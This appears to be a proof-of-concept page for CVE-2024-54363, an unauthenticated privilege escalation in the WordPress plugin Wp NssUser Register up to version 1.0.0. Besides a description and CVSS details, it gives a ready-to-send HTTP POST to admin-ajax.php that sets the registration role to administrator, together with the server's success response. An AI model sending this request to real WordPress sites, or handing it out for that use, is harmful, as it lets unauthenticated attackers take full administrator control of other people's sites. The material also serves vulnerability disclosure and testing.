CVE-2024-54363 PoC — WordPress Wp NssUser Register plugin <= 1.0.0 - Privilege Escalation vulnerability

Source

Associated Vulnerability

Description

Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation

Readme

# CVE-2024-54363
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation

# Description

The Wp NssUser Register plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to register on the site as administrators.

## Details

- **Type**: plugin
- **Slug**: wp-nssuser-register
- **Affected Version**: 1.0.0
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-54363
- **Status**: Closed

POC
---
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Referer: http://example.com/

action=nssTheme_registration_form&rgName=admin2&rgEmail=admin2@example.com&rgFname=Attacker&rgLname=User&rgRole=administrator&rg_pass=evilpass
```

```
<p>successful, just Check this: </p>            <a href="https://wp-dev.ddev.site/wp-login.php" title="Login">Login</a>
        
```

File Snapshot

 [4.0K]  /data/pocs/08efbdbb8869e14beeccb33e3a4c9b2426affdac
└── [1.2K]  README.md

0 directories, 1 file

Remarks